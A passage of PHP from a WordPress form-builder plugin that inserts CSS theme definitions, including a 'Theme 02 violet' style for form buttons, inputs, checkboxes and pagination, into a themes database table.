36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #CFAB1A;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #A08104;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E2DED7;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #ECBD00;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #ECBD00 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #ECBD00 ), color-stop(49%, #F5C403 ), color-stop(84%, #F8C90B ), color-stop(99%, #FFCC00 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #ECBD00 0%, #F5C403 49%, #F8C90B 84%, #FFCC00 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(7, \'Theme 02 violet\', \'v.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #C9ADEF;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #5C00DA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #5C00DA;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #3D0886;\r\n}.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #5C00DA;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png)  top left #3D0886;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E3E2E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: 